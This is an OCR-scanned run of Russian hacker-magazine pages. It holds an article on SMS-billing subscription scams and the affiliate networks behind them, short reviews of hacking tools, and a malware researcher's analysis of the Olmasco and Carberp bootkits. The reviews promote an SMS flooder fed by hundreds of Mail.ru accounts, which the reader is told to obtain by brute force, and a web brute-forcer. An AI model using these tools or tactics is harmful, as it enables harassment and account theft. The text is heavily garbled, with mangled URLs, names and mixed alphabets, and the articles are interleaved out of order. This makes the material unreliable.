невольно окажешься в шоке. 

Также стоит отметить, что многие такие сайты 
в принципе предоставляют пользователю 
конечный товар. Просто качество этого товара 
оставляетжелать лучшего (например, если 



ты хочешь скачать фильм, то после оплаты 
через СМС тебе дадут ссылку на торренты, 
которую ты бы мог найти и сам, приложив 
определенные старания), но это уже дело 
десятое. 

Всё это во многих случаях позволяет 
мошенникам избежать ответственности. 
Впрочем, вышесказанное не распространяется 
на сайты с псевдоподписками, являющимися 
обманом чистой воды, поскольку в обмен 
на них конечному пользователю абсолютно 
ничего не предоставляется. 









взлом 



БОРОДИНА РЕАЛЬНО ПОХУДЕЛА? 



ставляющая 5М5-биллинг. Такая комиссия 
может достигать 50% от стоимости товара или 
услуги, что, разумеется, многовато. Понятно, 
что продавцы вынуждены закладывать ее 
в конечную стоимость услуги (другими слова- 
ми, комиссию всё равно оплачиваем мы). 

5М5-биллинг подключают к всевозмож- 
ными сайтам и сервисам, поэтому выбор услуг 
и товаров, которые сейчас можно оплатить 
простой эсэмэской, достаточно широк. Это 
могут быть как материальные товары (майки, 
кружки, ложки и т. д.), так и виртуальные то- 
вары и/или услуги (рингтоны, доступ к файлу, 
голоса на сайтах, консультации по каким-либо 
вопросам и т. д.). Установка биллинга также 
не представляет никаких сложностей для про- 
давца товаров или услуг. Он должен выбрать 
компанию, которая предоставляет услуги 
5М5-биллинга, зарегистрировать свой ресурс 
и через ѵѵеЬ-интерфейс задать желаемые 
настройки биллинга. Впоследствии продавец 
будеттолько управлять своим счетом, не особо 
заботясь о технической стороне вопроса. 



«ТЕМНАЯ» СТОРОНА ОПЛАТЫ 



Любая монета имеет две стороны. То же самое 
касается и 5М5-биллинга. Описанная выше 
схема оплаты является «светлой», ведь, ис- 
пользуя ее, мы никоим образом не обманыва- 
ем конечного пользователя. Но, помимо опи- 
санной выше схемы, есть и «темная» версия. 

Сразу скажу, что мы не являемся ее 
сторонниками и не советуем тебе прибегать 
к ней. В 5М5-биллинге кроются определенные 
хитрости (которые, естественно, разрабатыва- 
лись исключительно из соображений удобства 
для потребителя), что позволяет применить 
некоторые уловки. Если конкретнее, то они 
связаны с подписками и псевдоподписками. 

Подписка представляет собой метод 
оплаты, схожий с обычной подпиской на что- 
либо в реальном мире (например, на твой 
любимый журнал). При этом ты оплачиваешь 
какой-то определенный срок (например, три 
дня) использования конкретной услуги, то 
есть заходишь на сайт, который предостав- 
ляет, например, консультации в какой-либо 



Я не случайно упомянул про лохотрон 
«Отличная диета Ксении Бородиной» и его 
многочисленные клоны, тянущие деньги 
с наивных пользователей. С ним связана одна 
небольшая история. 

Однажды Ксюша то ли всё-таки сама 
увидела в интернете сайты про собственную 
диету, которую она якобы хранит в яйце 
у зайца, то ли от кого-то узнала про них. 

Суть в том, что она решила подать в суд 
на многочисленных злоумышленников. 
Адвокаты подсчитали ущерб, который 
нанесло Ксении всё это безобразие (правда. 



сфере, и вводишьтам свой номер мобиль- 
ного телефона. Далее на этот номер при- 
ходит 5М5-сообщение с кодом, который ты 
вводишь на сайте. После этого со счета твоего 
мобильного телефона списываются средства 
(то есть происходит так называемый ребилл). 
Ребилл обычно происходит через 24 часа по- 
сле того, как ты ввел тот самый код на сайте, 
предоставляющем услугу (также выделяют 
мгновенный ребилл, при котором средства 
списываются сразуже). 

В чем тут подвох? Прежде всего в том, 
что ребилл может происходить каждый день 
до бесконечности, независимо оттого, на ка- 
кой срокты изначально оформил подписку. 
Крайне неприятно терять рублей по 50 каждый 
день, не правда ли? Впрочем, чтобы отказать- 
ся от подписки, обычно необходимо отправить 
СМС с кодом на определенный номер (это СМС, 
как правило, также оказывается платным). 

На сайте, предоставляющем услугу, об этом 
написано маленькими буковками, которые без 
лупы так просто не разглядишь. 

Псевдоподписка очень похожа на под- 
писку. Разница в том, что в случае псевдо- 



не огласили сумму), а впоследствии установили 
ІР-адреса злоумышленников и направили 
запрос в отдел «К», чтобы нещадно покарать 
всех организаторов подобных махинаций. 

В этом случае у Ксюхи были все основания 
завести иск — ведь ее имя использовалось 
для обмана конечных пользователей, которые 
велись на раскрученность ведущей. Чем 
всё это закончилось, история, к сожалению, 
умалчивает, но, думаю, хотя бы несколько 
«диетологов» уже испытывают эти диеты 
в местах не столь отдаленных, поэтому 
не вздумай повторять их ошибки! 



подписки тебе на телефон придет не код, 
а какой-нибудь вопрос, например, «голубое 
ли небо?». Если ты, считая себя суперумным, 
отправишь ответную 5М5, то с твоего счета 
автоматически спишутся деньги, ведь такая 
эсэмэска будет означать только лишь то, что 
ты согласен получать мошеннические услуги. 
Таким образом, серия сообщений «„Голубое ли 
небо?" — „Да"» равнозначна серии «„Не же- 
лаете ли оформить подписку?" — „Да"». Как 
правило, человек замечает подвох лишь после 
того, как баланс счета его телефона становит- 
ся отрицательным. 



ПРИМАНКА 



Конечно, вышеописанная схема крайне 
наивна и корява, но что заставляет людей 
вестись на нее? Почему они готовы расстаться 
со своими кровными? Я опишу тебе две вполне 
жизненных ситуации, и ты сразу всё поймешь. 

Итак, ситуация № 1. Ваня сидел за компью- 
тером, и ему на секунду показалось, что он 
стал немного хуже видеть (такое бывает, если 
долго пялиться в однуточку, например, в мо- 
нитор). Испугавшись таких изменений со зре- 
нием, он тут же завалился в поисковик и на- 
брал там «проверить зрение онлайн». Почему 
«онлайн»? Потому, что Ваню «прижало»: ему 
хотелось быстро узнать результат, а не ждать 
приема у квалифицированного специалиста. 
Конечно, Ваня испугался, а у страха, как из- 
вестно, глаза велики. Ваня ткнул первую же 
ссылку, которую выплюнул поисковик, и — 
о чудо! — это оказалось именно то, что нужно: 
сайт «Проверка зрения через интернет». 

Он, естественно, был очень хорошо 
оформлен и, что самое главное, предлагал 
проверить зрение уже сейчас! Ваня быстро 
нажал «Пройти проверку» и ответил на во- 
просы анкеты, которые якобы должны были 
выявить, что же всё-таки случилось с его 
глазами. Когда Ваня ответил на все вопросы, 
сайт сообщил ему, что постановка диагноза, 
вообще-то, платная, но стоит недорого и что 
для его получения необходимо ввести свой 
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Фальшивые 5М5: похудей за 30 дней! 
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Привлечение пользователя 



Платники тоже должен кто-то делать 



номер мобильного телефона в специальную 
формочку. На этот номер придет СМС с ко- 
дом, который Ваня должен ввести в другую 
формочку, после чего — вуаля! — диагноз 
окажется у него на руках (ѵѵеісоте Ьаск, 
подписки!). Ваня проделал эти нехитрые дей- 
ствия и получил советы типа «всё ОК, поешь 
морковки, и всё пройдет». При этом со счета 
мобильного телефона Вани начали ежедневно 
списываться средства. 

Ситуация №2. Алена бродила по просторам 
интернета в поисках новой модной музыки 
и на одном музыкальном сайте наткнулась 
на объявление о том, что ведущие диетоло- 
ги страны раскрыли тайную диету Ксении 
Бородиной, позволяющую есть сколько угодно 
и вообще не толстеть. 

Позабыв об элементарных законах обмена 
веществ, Алена решила перейти по объ- 
явлению и посмотреть, что же там за диета 
такаяю Тем более она давно хотела похудеть, 
поскольку, как и большинство девушек, 
считала себя невероятно толстой. А тут такой 
шанс — диета самой Ксюши Бородиной! По- 
сле перехода по объявлению Алена попала 
на сайт, весь усыпанный фотографиями Ксюхи 
и заманчивыми обещаниями типа «благода- 
ря этой диете вы похудеете за два дня, лежа 
на диване». Алена нашла большую кнопку 
«Получить диету» и нажала на нее. Сайт сооб- 
щил, что ей надо ответить на простой вопрос 
с помощью СМС. 

Алена ввела свой номер в специаль- 
ную формочку и получила сообщение типа: 



«Хочешь ли ты похудеть? Ответ на это СМС 
будет стоить 100 рублей». Конечно же, Алена 
ответила «да», после чего с ее мобильника 
списались средства, но никакой мегаубойной 
диеты она не получила. 

Рассмотрев эти две ситуации, можно по- 
нять, что пользователей разводят прежде 
всего на желании получить какой-то товар или 
услугу как можно быстрее, а также на страхе, 
любопытстве (что там за супердиета?) и других 
человеческих слабостях. Дело во многом и в 
психологии — если человеку предложить что- 
то привлекательное, нужное и заслуживаю- 
щее внимания, то он может заинтересоваться 
этим, несмотря на то что подвох практически 
очевиден. Примерно по таким же принципам 
работают и некоторые продавцы в реале, ко- 
торые предлагают купить обычные пустышки, 
выдавая их за реликвии. 



взгляд ИЗНУТРИ 



Провернуть такую аферу один человек за- 
частую просто не в состоянии. Всё дело в рас- 
крутке мошеннического ресурса, ведь нужно, 
чтобы о нем узнали широкие массы. Именно 
поэтому в случаях, подобных описанным, за- 
частую используется одна и та же схема. 

Итак, существуют платники — уже раз- 
работанные мошеннические сайты опреде- 
ленной тематики (та же диета). Платники 
можно найти через партнерские программы. 
Они предлагают 5Е0-мастерам определенный 
процент с прибыли. 5Е0-мастер раскручи- 
вает определенный платник и получает свой 



процент с каждой отправленной эсэмэски. 

Всё просто! Мастер находит партнерскую про- 
грамму, выбирает платник, который он будет 
продвигать, устанавливает цены подписок 
и псевдоподписок и начинает его продвигать. 
Обычно реферальная ссылка на платник вы- 
глядит примерно следующим образом: Ьир:// 
1оЬ.ги/?р1б=15991&5иЫс1=25483. 

Мастер сам решает, как продвигать плат- 
ник. Зачастую в ход идут обычные дорвеи, 
то есть сайты, которые не несут какой-либо 
ценности для пользователя, а всего лишь 
перенаправляют его на мошеннический сайт. 

В этом случае мастер ищет ключевые слова, 
которыми можно напичкать дорвей, ищет 
текст, генерирует дорвей с помощью доргена 
(этот процесс более подробно описывался 
в одном из прошлых номеров ][), продвигает 
дорвей и получает свой процент. 



что в ИТОГЕ? 



Теперь ТЫ знаешь, как разные недобросовест- 
ные личности разводят не очень дальновид- 
ных пользователей на СМС. Самый банальный 
совет — не ведись на сладкие предложения 
на очередном ярко раскрашенном сайте. 
Помни, что всевозможные тесты, диеты, 
фильмы, гадания и т. п. при большом желании 
вполне можно найти и в паблике. И ужтем бо- 
лее не рекомендую тебе заниматься продви- 
жением таких мошеннических сайтов (к чему 
это может привести, читай в соответствующей 
врезке). Помни, что любой обман может вер- 
нуться к тебе бумерангом ! ^ 



ПРИМЕРЫ ПАРТНЕРСКИХ ПРОГРАММ 



Лпсопѵегі.ги — одна из самых рас- 
пространенных партнерских про- 
грамм. Каких платников туттолько 
нет: и всевозможные гадания, и диеты, и даже 
платники, которые рассказывают о том, как 
правильно общаться с представителями 
закона. В общем, гуляй — не хочу! Принима- 
ется как наш трафик, так и зарубежный, есть 
реферальная система, предлагающая 5 % 
от доходов привлеченного веб-мастера. 



Іоасіраѵз.ги — также распростра- 
ненная партнерская программа, 
которая специализируется на под- 
тасовывании сайтов, предлагающих скачать 
что-либо. Обычно конечному пользователю 
в результате дается ссылка на паблик- 
торрент или на файлообменник. Файловый 
трафик пользуется большим спросом, так 
как полно народа хочет на халяву разжиться 
свежим фильмом или программой. 



Сопѵегі-ріиз.ги (ныне іп^о-сепіег. 

^) — партнерка, которая также 
специализируется на всевозможных 
гаданиях, тестах совместимости и прочих 
подобных вещах. Принимает преимуще- 
ственно русский трафик. 
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взлом 



Маг(іс^ 884888, НирѴ/зпіррег.ги) 



Х-Тооіз 

СОФТ для ВЗЛОМА и АНАЛИЗА БЕЗОПАСНОСТИ 




Автор: 

МЕОх. 

УРІ: 

ЬіМу/х51к8п. 

Система: 

ѴѴіпсІоѵѵз. 





Автор: 

^атаіесН. 

УРІ: 

гасітіп.ги/ргосіисіз/ 

ірзсаппег. 

Система: 

ѴѴІПСІОѴѴБ. 





Автор: 

5иісісіе[ѴІІ]. 

УРІ: 

гООі.іп/зНоѵѵіНгеасІ. 

рНр?1=18056. 

Система: 

ѴѴіпсІоѵѵз. 




ХАКЕРСКИЙ КОМБАЙН РЕТ0015 




ЛЕГКОЕ СКАНИРОВАНИЕ ВМЕСТЕ 




УБИЙЦА МОБИЛЬНИКОВ 




САОѴАМСЕО ІР5САММЕРІ 


ОЕАТН-МОВІЕЕІ 



РЕ ТооІ5 — это полнофункциональная утили- 
та для работы с файлами РЕ/РЕ+ (64Ьіі). Она 
включает в себя следующие модули: редактор 
РЕ-файлов, Тазк Ѵіеѵѵег, оптимизатор ѴѴіп32 
РЕ-файлов, детектор компилятора/упаковщика 
и многое другое. Основные возможности про- 
граммы просто поражают воображение. 

1. ТазкѴіеѵѵег: 

• создание дампов процессов (РиІІ, Рагііаі, 
Редіоп); 

• созданиедампов.МЕТ СЕР-процессов; 

• автоматическоеснятиезащиты Апіі Оиптір 
Ргоіесііоп; 

• изменение приоритета процесса; 

• завершение работы процесса; 

• загрузка процесса в РЕ Есіііоги РЕЗпіІ'І'ег; 

• определение ОЕР. 

2. РЕ5піІ!ег: 

• определениетипа компилятора/упаковщика; 

• обновление базы сигнатур; 

• сканированиедиректорий. 

3. РЕРеЬиіІсІег: 

• оптимизация РЕ-файла; 

• изменениебазовогоадреса РЕ-файла. 

4. РЕЕсІіІог: 

• редактирование 005-заголовка; 

• поддержка нового формата РЕ+ (64Ьіі); 

• корректирование СРС; 

• просмотри редактированиетаблицимпорта/ 
экспорта. 



Если ты когда-либо использовал в своей по- 
вседневной работе Расіпгііп, то советую тебе 
попробовать в деле еще одну программу оттех 
же авторов — АбѵапсесІ ІР Зсаппег. Как ясно 
из названия, прога представляет собой про- 
двинутый сетевой сканер. 

Функционал и основные достоинства тулзы: 

1. Быстрое сканирование сети. Прога осущест- 
вляет многопоточное сканирование сотен 
компьютеров в сети, чтобы найтитакие ре- 
сурсы, какобщие папки, НТТР, НТТР5 и РТР, 
и получитьдоступ кним. 

2. Интеграция с Расіпгііп. Благодаря инте- 
грации с Расіппіп, наш сканер находит все 
машины с запущенным Расіппіп Зегѵеги по- 
зволяетзатем подключиться кним водин 
клик. Для этого на компьютере, с которого 
осуществляется сканирование, должен быть 
установлен Рабтіп Ѵіеѵѵег. 

3. Удаленное выключение компьютеров. Эта 
функция служитдля выключения любого 
удаленного компьютера или группы компью- 
теров с виндой на борту. 

4. Функция ѴѴаке-Оп-ЕАМ. Эта функция позво- 
ляет включать удаленный компьютер или 
группу компьютеров, если они поддержива- 
ют функцию ѴѴаке-Оп- БАМ. 

Интуитивно понятный интерфейс и удобство 
использования сканера я советую тебе оце- 
нить самостоятельно. 



Прога представляет собой продвинутый 5М5- 
флудер, позволяющий рассылать сообщения 
с любым текстом. Длина одного СМС стандар- 
тна и составляет около 75 символов на кирил- 
лице и 120 символов на латинице. Поддер- 
живается отправка СМС в такие страны, как 
Россия, Казахстан, Узбекистан, Украина. Для 
работы флудера требуются валидные аккаунты 
МаіІ.Ри. Автор рекомендует иметь от 100 до 300 
таких аккаунтов. Ты вполне сможешь найти 
раздачи с ними, зарегистрировать аккаунты 
самостоятельно или же воспользоваться од- 
ним из многих публичных брутфорсеров этого 
сервиса. Файл с аккаунтами должен иметь вид: 

туте§аетаі1@таі1 . пи : равзы 
1о§іп@Ьк. пи: ра55 

Интервал флуда с одного мейла составляет 
примерно одну минуту, поэтому создатель про- 
граммы рекомендует работать с ней с дедика, 
так как при этом достигается достаточно боль- 
шая скорость флуда. Из удобств ОеаіЬ-МоЬіІе 
следует отметить подробный логтекущих 
действий (действие, номер телефона, мыло), 
а также лог, в котором фиксируется, какие 
сообщения доставлены, а какие не дошли 
до адресатов. Остальные фичи программы ты 
сможешь изучить при личном ознакомлении 
с ней. 
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Х-Т00І5 




Автор: 

аІ-сНетІ5І. 

УРІ: 

аІ-сИетІ5І.ги/ 

сІп^іпсІег.ЫтІ. 

Система: 

ѴѴІПСІОѴѴБ. 



РОМАІМ МАМЕ РІМРЕР, ИЛИ КАК НАЙТИ КРУТОЙ ДОМЕН 



Представляю твоему вниманию про- 
сто незаменимую для домейнеров 
и сеошников всех мастей утилиту 
Ооппаіп Мате Ріпсіег. Как ясно из на- 
звания, эта тулза предназначена 
для поиска свободных доменных 
имен. Зачем тебе доменные имена? 
Их всегда можно припрятать по- 
дальше, а затем выгодно продать 
нуждающимся! Также можно создать 
хороший 5Е0-ШОП на хорошем до- 
мене — вариантов много. 

Основные возможности программы: 

• проверка доменныхимен, задан- 
ныхшаблоном встилерегулярно- 
го выражения; 



• проверка спискадоменныхимен; 

• наличиетрехразличныхдвижков 
проверки; 

• сохранениесписка свободных 
доменов в различныхформатах; 

• возможностьпродолжитьпре- 
рванную проверку; 

Прога однозначно не поможет 
тебе зарегистрировать (а затем 
и продать) какой-нибудь ѵіадга. 
сот, но что-то подобное подобрать 
вполне возможно. Например, вот 
регэпс для поиска чего-то вроде 
хакерѵіадга.сот: [а-2]{5,5}ѵіадга.сот. 
Дерзай! 




Автор: 

І.Наіог (ЕегѵеРТеат). 

УРІ: 

\л/ѵѵ\л/. 2 егѵегіеат.сот. 

Система: 

ѴѴіпсІоѵѵз. 





Автор: 

МагсеІІо РіеігеІІі & 
0іаппі Ваіпі. 

УРІ: 

ЬіЫу/икѴѴаЗХ. 

Система: 

ѴѴІПСІОѴѴБ. 





Автор: 

Зайцев 0. В. 

УРІ: 

2-оІед.сот/5есиг/ар5. 

Система: 

ѴѴіпсІоѵѵз. 




УЛЬТИМАТИВНЫЙ БРУТФОРСЕР 
ѴУЕВТООЫ 



РІГЕ5 ТЕРМІМАТОР , 


АР5 — НЕ ДАЙ СЕБЯ ПРОСКАНИТЬ! 


УБЕДИТЕЛЬНОЕ СТИРАНИЕ ДАННЫХ 





ѴѴеЬ ТооІ — это программа, предназначенная 
для автоматизации 6ЕТ- и Р05Т-запросов. 
Соответственно, может использоваться для 
брута/парси н га/чеки н га/на крутки хостов/ата- 
ки/прокси-чекинга и т. п. 

Во всех полях программы (за исключением 
полей Оаіа и СІзегАдепі) поддерживаются 
следующие переменные: 

#ц5ег# - логин . 

#ра55# - пароль^ 

#тсІ5(и5ег)# - логин в тсІ5. 

#тсІ5(ра55)# - пароль в тсІ5. 

#1;океп1# - #1;океп(1-Х)# - токеньц 
#соип1;# - счетчик брута. 

В коде, полученном после запроса с токе- 
ном, осуществляется поиск указанной строки. 
Считывание начинается сразу после нее (или, 
если нужно, после X следующих символов) 
и выполняется до конечной строки (чаще всего 
она состоит из символа < или «). Прога имеет 
три режима: 

1 . Режим 5оигсе-файл а: логины и пароли 

в виде піск;ра55 берутся из одного файла. 

2 . Режим двух файлов:логины отдельно, паро- 
ли отдельно. 

3 . Режим цикла: программа сработаетука- 
занное количество раз без использования 
логинов и паролей. 



На тему безопасного стирания данных велось 
уже немало разговоров, но я хочу продолжить 
ее и познакомить тебя с очередной тематиче- 
ской утилитой. Имя ей — Рііез Тегтіпаіог. Эта 
утилита обеспечивает конфиденциальность 
твоих данных, полностью удаляя приватные 
документы, изображения, видео и другие фай- 
лы путем перезаписи свободного дискового 
пространства. В процессе «стирания» файлов 
их содержимое несколько раз перезаписы- 
вается случайными данными и предопреде- 
ленными символами, таким образом, восста- 
новить эти файлы будет нельзя. Кроме того, 
программа позволяет «очистить» свободное 
пространство с помощью сложных алгоритмов 
шифрования, для того чтобы безвозвратно 
уничтожить даже те файлы, которые ранее 
были удалены небезопасным способом. 
Программа предоставляет на выбор девять 
алгоритмовудаления инфы: 

1 . Псевдослучайный. 

2 . Британский, НМ6 155. 

3 . Случайный. 

4 . Российский, ГОСТ Р50739-95. 

5 . Алгоритм министерства обороны США, ОоО 
5220.22-М(Е). 

6 . Немецкий, Ѵ5ІТР. 

7 . Канадский, РСРМТ55ІТ0Р5-ІІ. 

8 . Алгоритм Брюса Шнайера. 

9 . Алгоритм Питера Гутмана. 



АР5 (Апіі Рогі Зсаппег) — это маленькая, 
но очень нужная программа. Она прослушива- 
ет несколько сотен портов (указанных в обнов- 
ляемой базе данных программы), имитирует 
наличие на них уязвимых сервисов и анализи- 
рует все подключения по этим портам. 

Эта программа в основном предназначена для 
обнаружения хакерских атак. Как известно, 
сканирование портов помогает определить тип 
операционной системы и обнаружить потен- 
циальноуязвимые сервисы (например, почту 
или ѵѵеЬ-сервер). После сканирования портов 
многие сканеры определяюттип сервиса, пере- 
даваятестовыезапросы и анализируя егоответ. 
Утилита АР5 проводит обмен с атакующим 
и позволяет однозначно установить фа кт атаки. 
Кроме этого, утилита может применяться для 
выполнения следующихзадач: 

• обнаружение разного рода атак; 

• тестирование сканеров портов и проверка 
сетевой безопасности; 

• тестированиефайервола и оперативный 
контроль его работы; 

• блокированиесетевыхчервей; 

• тестированиеантитроянскихи антивирус- 
ныхпрограмм, систем Ю5; 

• блокирование троя неких программ, пере- 
численных в базе. 
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Матросов Александр, Зепіог таіѵѵаге гезеагсНег, Е5ЕТ 



МАШАІІЕ 



Веселая 

тройка 

б^^итов 




САМЫЕ ТЕХНОЛОГИЧНЫЕ УГРОЗЫ 2011 ГОДА 
В ВЕСЕЛЫХ КАРТИНКАХ 



Март этого года — самое правильное время для 
подведения итогов года прошлого. Ну, сам понимаешь: 
новогодние каникулы уже позади, до майских 
праздников еще далеко, голова светлая — можно 
и итоги подвести. 



/ 

4 



/7 



/4^ /4'^ л 

^// 



о ВооікІІ РоС еѵоіиііоп: а ВооіКІі ТТігеаіа еѵоІиПоп: 



«''еЕуе Воо1гоо((2005) 
^ѴРоо1кГ((2007} 
^ѴРоо1кКѵ2 (2009) 

Веоікіі: (2009) 
'^ЕѵІІсогехбД (2011) 
ѵ^5Юпей хад (2011) 



^МеРгоо1{2007) 
і^Меьгаііх (200В) 
^МеЬгоо1ѵ2 (2009) 
ѵ^Оітагік (2010/11) 
'^ОІта«со(2011) 
^Коѵпіх(2011) 
’^СагЪеф (2011) 



ІоасІ МВР 




геасі тосіе 




ІоасІ ѴВР 


Іоасі таіісіоиз 


геаЬ тосіе 


МВР/ѴВР 


Іоасі Ьооітдг 


МТ кегпеі 


геасі ппосІе/рго1:ес1:есІ тосіе 


тосЛПсаІіопз 


Іоасі ѵѵіпіоасі.ехе 
огѵѵіпгезите.ехе 


Іоасі гооікк 


геасі тосІе/рго1:ес1:есІ тосіе 


сігіѵег 


Іоасі кегпеі апсі 
Ьооі зіагі сігіѵегз 





Рис. 1. Развитие современного буткитостроения 



Рис. 2. Схема загрузки буткита 






Веселая тройка буткитов 
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Рис. 3. Модифицированная ѴВР на зараженной системе 
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Рис. 4. Раздел для компонентов буткита ОІтазсо 



□ точки зрения развития вредоносного программного обе- 
спечения прошедший год можно охарактеризовать как год 
развития 64-битных буткитов. Если в 2010 году мне был 
известен лишь один буткит для 64-битных систем — ѴѴіп64/0Ітагік 
(Т014), то в этом году мы получили интересный букет из Роѵпіх, 
2егоАссе55 (ирсіаіе), Т014 (ирсіаіе), СагЬегр, ОІтазсо (также извест- 
ный как Мах55). И это только те угрозы, которые умеют обходить 
защитные механизмы проверки цифровой подписи для модулей 



ядра и используют интересные технологии. Развитие современно- 
го буткитостроения можно изобразить в виде схемы, представлен- 
ной на рис. 1. 

Здесь отображены наиболее значимые моменты как в развитии 
РоС-реализаций, так и в воплощении этих технологий в боевых 
вредоносных программах. Заражая загрузочный сектор жесткого 
диска (МВР) или другой загрузочный код, который отрабатывается 
еще до начала инициализации операционной системы, вредонос- 
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Рис. 5. Сигнатура корневой директории скрытой файловой системы ОІтазсо 
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Рис. 6. функция загрузки файла из скрытой файловой системы — ОІтазсо 



ная программа может получить контроль над загрузкой компо- 
нентов операционной системы, чтобы внести модификации в этот 
процесс. 

Именно эти модификации в дальнейшем позволяют обходить 
механизмы проверки цифровой подписи и загружать вредоносные 
драйвера в обход защитных механизмов. Но давай все-таки вер- 
немся к нашему хит-параду сложных угроз, тем более что их спектр 
действительно очень широк. 

В прошлом году первое место нашего рейтинга занял Зіихпеі, 
а в одном из последних номеров я уже описывал механизмы рабо- 
ты Оири (обнаруженного осенью младшего брата Зіихпеі). Но, увы, 
на этот раз ему не суждено попасть в наш рейтинг, так как львиная 
доля используемых им технологий уже знакома нам по червю 
Зіихпеі (хотя, если бы авторы проплатили рекламное место в жур- 
нале «Хакер», мы бы поместили их творение на первое место :)). 
Оири разработан на основе той же самой программной платформы. 
Из его запомнившихся особенностей стоит отметить, пожалуй, 
только эксплуатацию шикарной 0-бау-уязвимости СѴЕ-2011-3402 
для загрузки вредоносного кода в ядро и повышения привилегий, 
но это уже тема для отдельной статьи ;). 



ТА-ДА-ДАМ! ПЕРВОЕ МЕСТО! 



Итак, первое место по технологичности занимает ОІтазсо. Эта 
угроза интересна в первую очередь тем, что модифицирует ѴВР 
(Ѵоіите Вооі Ресогб) и имеет полноценную собственную файловую 
систему для хранения дополнительных модулей и других ком- 
понентов. Как выглядит модифицированная ѴВР на зараженной 
системе, показано на рис. 3. 

Большинство антивирусных продуктов научились эффективно 
справляться с активным заражением буткитами, использующими 
модификацию МВР. Однако злоумышленники пошли дальше, а точ- 
нее сказать, стали рыть глубже для противодействия антивирусам. 
Это вызвало у некоторых антивирусных вендоров определенные 
сложности, в результате чего злоумышленники получили возмож- 
ность оставаться незамеченными в системе. Устройство внутрен- 
ней файловой системы также заслуживает отдельной статьи. 

В конце жесткого диска создается полноценный раздел, в котором 
размещаются все компоненты буткита (рис. 4). 

Файловая система хранит время и дату создания файла и даже 
контрольную сумму для проверки целостности. С точки зрения 
технологичности буткит с этой файловой системой благодаря ее 










Веселая тройка буткитов 



структуре превосходит все другие угрозы, использующие скрытые 
файловые хранилища. Сигнатура корневой директории скрытой 
файловой системы приведена на рис. 5. 

Функция загрузки файла из скрытой файловой системы 
в руткит-драйвере представлена на рис. 6. 

Так как драйвер написан на чистом С без обфускации, нам уда- 
лось декомпилировать код драйвера при помощи ЮА и Нех-Рауз 
и таким образом восстановить его структуру. 

Не менее интересен и процесс модификации системы во время 
загрузки. Этот довольно сложный процесс проиллюстрирован 
на рис. 7. 

Дополнительно стоит отметить и то, что ОІтазсо, как и Т014, 
имеет буткит-часть, которая модифицирует библиотеку ксІсоіті.сІІІ. 
Именно она отвечает за отладку ядра при помощи ѴѴіпОЬд, а после 
ее модификации отладчик не может подключиться к системе для 
удаленной отладки. В итоге вариантов остается не так много: либо 
исследовать все модули в статике (в случае если их уже удалось 
извлечь из скрытой файловой системы), либо пытаться вернуть 
оригинальный ксІсоіті.сІІІ и грузить вредоносный драйвер вручную. 
Исследовать функционал буткит-части тоже не так-то просто, 
но в этом нам поможет эмулятор ВосЬз и отладка системы на самой 
ранней стадии загрузки прямо из ЮА Рго. 

Итак, ОІтазсо получил первое место за технологичность соб- 
ственной файловой системы и оригинальный механизм буткита, 
который использует ряд наработок из Т014 и затрудняет лечение 
за счет нестандартных системных модификаций. 



СЕЙЧАС УСТАНОВЩИК ИСПОЛЬЗУЕТ 
ЧЕТЫРЕ РАЗНЫЕ УЯЗВИМОСТИ 
ДЛЯ ПОВЫШЕНИЯ ЛОКАЛЬНЫХ 
ПРИВИЛЕГИЙ В СИСТЕМЕ 



ТУ-ДУ-ДУМ! ВТОРОЕ МЕСТО! 



Второе место по праву занимает обновленная версия СагЬегр, ко- 
торая обзавелась достаточно любопытным буткит-функционалом. 
СагЬегр вообще можно назвать не только одной из самых техно- 
логичных, но и самой жадной вредоносной программой прошлого 
года. Этот буткит атакует наиболее известные дистанционные 
системы банковского обслуживания, но речь сейчас не об этом. 
Впервые идентичный буткит-функционал появился у ѴѴіп64/Роѵпіх, 
который в начале лета доставил немало хлопот пользователям 
рунета. СагЬегр и Роѵпіх базируются на одном буткит-коде, инфор- 
мация о продаже которого неоднократно встречалась на разных 
киберкриминальных форумах в начале прошлого года. 

Изначально СагЬегр имел только функционал для пользова- 
тельского режима, но прошлой осенью были созданы модификации 
с буткитом. В процессе анализа свежих дропперов мне попались 
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Рис. 8. Покупайте наши буткиты! 
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Рис. 7. Процесс модификации системы во время загрузки — ОІтазсо 



Рис. 9. Интересные строковые константы из распакованного установщика СагЬегр 
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Рис. 10. Декомпилированный код, ответственный за эксплуатацию уязвимостей - СагЬегр 

на глаза любопытные строковые константы из уже распакованного 
установщика (рис. 9). 

Эти строчки сразу навели нас на мысли о системных модифи- 
кациях, производимых буткитом. Но давай сначала поговорим 
о дроппере, который содержит целый букет эксплойтов для повы- 
шения привилегий. В первую очередь их наличие связано стем, 
что для установки буткита требуются привилегии администрато- 
ра или системы. У корпоративных пользователей (а именно они 
являются целью злоумышленников), имеющих доступ к ДБО, может 
просто не быть прав на запуск исполняемого файла с высокими 
привилегиями, и методы социальной инженерии тутуже не по- 
могут. Поэтому сейчас установщик эксплуатирует четыре разных 
уязвимости для повышения локальных привилегий в системе: 

• М510-073 (ѵѵіпЗЗк.зуз КеуЬоагбІауоиІ; ѵиіп); 

• М510-092 (ТазкЗсИебиІегѵиІп); 



ИНТЕРЕСНОЙ ОСОБЕННОСТЬЮ 
ДРОППЕРА ЯВЛЯЕТСЯ СНЯТИЕ 
ХУКОВ И СПЛАЙСОВ С НЕКОТОРЫХ 
СИСТЕМНЫХ ФУНКЦИЙ 



Рис. 11. Снятие хуков и сплайсов с системных функций в исполнении СагЬегр 

• М511-011 (\л/іп32к.5у55у5І:ет0еІаиИ:Еи0СРопІѵиІп); 

• МЕТРип^ітеОр^ітігаІіоп ѵиіп ( ). 

Декомпилированный код, эксплуатирующий уязвимости, при- 
веден на рис. 10. 

Еще одной интересной особенностью работы дроппера явля- 
ется снятие различных хуков и сплайсов с некоторых системных 
функций перед непосредственным запуском буткит-установщика 
(рис. 11). 

Это своего рода обход различных песочниц и средств мони- 
торинга, которые используют хуки в пользовательском режиме. 

В процессе работы буткит-части в обход механизмов проверки 
цифровой подписи и других средств защиты загружается вре- 
доносный драйвер. Задачей этого драйвера является внедрение 
полезной нагрузки в адресное пространство изег-ппобе-процессов. 
До этого использовались методы внедрения в пользовательском 
режиме, такие как МШиеиеАрсТЬгеабО/МіРезиппеТЬгеабО. 

Фактически СагЬегр состоит из трех частей: буткит-части, за- 
гружаемого ей драйвера, и бІІ-модуля, внедряемого драйвером 
в пользовательском режиме. Странно, что разработчики не ис- 
пользовали все возможности, которые им предоставляет загру- 
женный код на уровне ядра системы. Все перехваты системных 
функций устанавливаются уже внедренным модулем в пользо- 
вательском режиме. Их легко обнаруживают такие инструменты, 
как СМЕВ или РКСІ. 

